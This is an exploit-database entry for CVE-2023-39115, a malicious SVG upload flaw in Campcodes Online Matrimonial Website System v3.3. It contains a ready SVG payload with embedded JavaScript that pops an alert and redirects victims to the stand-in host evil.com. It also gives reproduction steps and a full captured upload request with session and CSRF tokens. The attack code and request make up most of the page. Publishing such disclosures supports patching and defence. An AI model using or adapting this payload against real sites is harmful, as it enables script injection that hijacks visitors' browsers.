Campcodes online matrimonial website system v3.3 code execution via malicious svg file upload Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-08-04 | Type : webapps | Platform : php
This exploit / vulnerability Campcodes online matrimonial website system v3.3 code execution via malicious svg file upload is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload
# Date: 3-8-2023
# Category: Web Application
# Exploit Author: Rajdip Dey Sarkar
# Version: 3.3
# Tested on: Windows/Kali
# CVE: CVE-2023-39115



Description:
----------------

An arbitrary file upload vulnerability in Campcodes Online Matrimonial
Website System Script v3.3 allows attackers to execute arbitrary code via
uploading a crafted SVG file.


SVG Payload
------------------

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert("You have been hacked!!")


window.location.href="https://evil.com"
</script>
</svg>


Steps to reproduce
--------------------------

-Login with your creds
-Navigate to this directory - /profile-settings
-Click on Gallery -> Add New Image -> Browser -> Add Files
-Choose the SVG file and upload done
-Click the image!! Payload Triggered


Burp Request
-------------------

POST /Matrimonial%20Script/install/aiz-uploader/upload HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
Content-Type: multipart/form-data;
boundary=---------------------------167707198418121100152548123485
Content-Length: 1044
Origin: http://localhost
Connection: close
Referer: http://localhost/Matrimonial%20Script/install/gallery-image/create
Cookie: _session=5GnMKaOhppEZivuzZJFXQLdldLMXecD1hmcEPWjg;
acceptCookies=true; XSRF-TOKEN=I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="relativePath"

null
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="name"

file (1).svg
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="type"

image/svg+xml
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="aiz_file"; filename="file (1).svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert("You have been hacked!!")


window.location.href="https://evil.com"
</script>
</svg>
-----------------------------167707198418121100152548123485--